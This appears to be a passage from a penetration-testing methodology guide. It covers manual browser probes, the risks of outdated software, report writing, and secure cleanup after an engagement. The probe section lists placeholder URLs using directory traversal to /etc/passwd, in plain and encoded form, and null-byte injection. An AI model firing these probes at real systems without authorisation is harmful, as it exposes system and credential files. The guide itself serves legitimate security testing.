Backtracking - exploration
These are browser-based attacks that are manually attempted to elicit error messages or unexpected results - both of which indicate a vulnerability.
Keep in mind that a browser can attempt to interface with any service on an open port. In some cases it is helpful to open an unusual port to see the response. Web based services are often run to provide administrative or other services outside of an application's primary interface on port 80 or 443.
Refer to the URL manipulations page for detailed examples.
Progressively move up a directory structure to see what you find:
Null bytes - poison payload
Append a null byte: Also try sending a null byte as a parameter:
Value manipulation - poison payload
Alter the value of GET variable to manipulate the pages response:
Directory traversal - exploration
Use all sorts of encodings and variations on ../ to move up and down into other directories:
Directory Listings - exploration
Check for directory listings, and combine directory traversal with directory listings.
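Illustrative forms of the probes above (the host, paths, and parameter names are placeholders):
Move up the directory structure:
http://target.org/app/reports/2023/summary.pdf
http://target.org/app/reports/2023/
http://target.org/app/reports/
http://target.org/app/
Null bytes:
http://target.org/app/page.php%00
http://target.org/app/page.php?file=report.pdf%00
Value manipulation:
http://target.org/app/page.php?id=2 (then try id=1, id=9999, id=-1)
Directory traversal:
http://target.org/app/page.php?file=../../../../etc/passwd
http://target.org/app/page.php?file=..%2F..%2F..%2Fetc%2Fpasswd
Directory traversal combined with directory listings:
http://target.org/app/page.php?file=../../uploads/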
"The NTFS file system includes support for alternate data streams. This is not a well known feature and was included, primarily, to provide compatibility with files in the Macintosh file system. Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called :$DATA." (08/09/19 https://www.owasp.org/index.php/Windows_::DATA_alternate_data_stream)
https://www.giac.org/paper/gsec/2803/windows-alternate-data-streams/103828
There are a few issues to be concerned about when it comes to older software that you identify in the enumeration step.
The presence of significantly outdated software is not simply an issue of neglectful systems management. It also encourages an attacker to probe further, deeper, and longer on the assumption that corners have been cut and best practices not followed in other areas that could be exploited.
New vulnerabilities are reported almost daily that apply not only to the current version of a program, but to most or all previous versions. And when software is left un-updated for several major versions, it is likely that any available security patches and updates have also been left unapplied.
Vulnerabilities in older software are discovered every day. Attackers know that outdated software can be found all over the Internet and in homes and offices of every size and type. So there is a huge incentive to discover vulnerabilities in older versions of software rather than just the most current.
In addition, vulnerabilities found in the most current version of an application are likely to exist in most if not all previous versions of that application.
Outdated software can be present even when the administrator(s) believe that everything is up to date. This can happen when backups are used to restore systems and those programs do not contain updates that were actually applied after that backup was created.
Each time you see an application banner or other information about software, be sure to look for the copyright notice. Copyright notices are usually dated with a year, which implies when that software was last updated. Often you can find this even when the application version number leaves its age ambiguous.
The purpose of this section is to provide information about the reports that should be produced for each engagement and any meetings intended to share or explain the process, procedures, and results of each engagement. You should begin gathering this information at the beginning of each engagement and then add to it at points where new and pertinent information is discovered.
Now we reach the point of all our efforts. We have worked smart and hard to identify potential vulnerabilities and their probable impact on a system. Now we convey what we have found along with recommendations for addressing each.
There are a few points to keep in mind.
1. Your job is to effectively communicate your findings both written and spoken. The final report that you deliver must be written to at least two audiences. The first is management. Here you want to avoid technical terms and clearly define and illustrate those you do use. (See the end of this section for examples of illustrating technical concepts).
2. You want to give the client information that is clear, understandable, and relevant. But you do not want to make the fixes for the client.
In reporting what you have done and found, you want to avoid padding the report with meaningless information, extraneous graphs, and anything else that does not help to clearly communicate what the client needs to be informed of. Too often reports pander to those levels of management that either approve purchases, or are hoping for enough technobabble to create the appearance of super-techno efforts they can use to advance unrelated agendas.
A little advice, at every preceding point you should have been taking notes, capturing screen shots, noting URL references containing more detailed information, and so on. In effect, you should be writing the final report from the very start of the engagement. If you have to begin the process of reporting now, after finishing all the active scanning and probing, you are only increasing the time and effort you need to expend, and likely reducing the quality of the final report - your deliverable.
As you worked through the engagement, applying the methodology, you will have filled out the majority of the report template.
The report template file is located at Template\Template.Pentest.Report.doc
You will have copied the contents of the Template directory to the working directory for each engagement. Be sure to rename the report template to identify the client for each engagement.
Several of the programs recommended in The Purple Files will identify known vulnerabilities. Rather than try to maintain a db of all known exploits, you should research each red flag any program identifies to get the latest information about it and its remediation.
Be sure to include the severity metrics for each issue identified or observed. These can typically be found at the NVD (National Vulnerability Database).
Work with the client through secure email and/or on-site on questions, suggestions, explanations, and so on, in order to help the client understand and remediate the issues that were identified.
After a period of time for remediation, recheck the issues that were identified to verify they have been effectively addressed.
Keep management informed during these steps.
All relevant files created during an engagement are to be moved into the Pentesting directory on the R&C network drive. (Consider encrypting them)
All files created during an engagement that are located on the operator's system should be destructively removed.
Ben, lots of info and examples of srm and sfill.
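A minimal sketch using srm and sfill from the secure-delete package (the paths are assumptions):
srm -r /root/ThePurpleFiles/workspace/   # securely overwrite and remove the engagement files
sfill -v /root   # then wipe the free space on the partition that held them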
If a session was created in Metasploit, it should be deleted.
MD5 stands for Message Digest version 5, a common hashing algorithm. A hash is a single numeric value calculated from digital input material (a string, a file, a disk...) of any type or size. For practical purposes the resulting hash value identifies that input material and can be used to verify that the material has not been changed since the hash value was calculated. A hash value also cannot be reversed in any way to produce the original input material. Note that MD5 is no longer considered collision-resistant, so prefer sha512sum (as used elsewhere in this framework) when the hash must stand as evidence.
Generate an md5 log for all files in the workspace directory. Make sure you have changed to the workspace directory using the cd command before running the following:
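A possible form, writing the log one level up so that the log file itself is not included in the hashes:
cd /root/ThePurpleFiles/workspace
find . -type f -exec md5sum {} \; > ../md5.engagement.log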
About me...
Hackers prompt Kentucky shakeup - By Wilson P. Dizard III Aug 13, 2003
Kentucky shakes up systems after large-scale hacking - By Wilson P. Dizard III Jul 30, 2003
Hackers attack Kentucky - Jul 31, 2003
Discarded Computer Had Confidential Medical Information - February 6, 2003 at 8:30 PM EST - Updated June 18 at 12:46 PM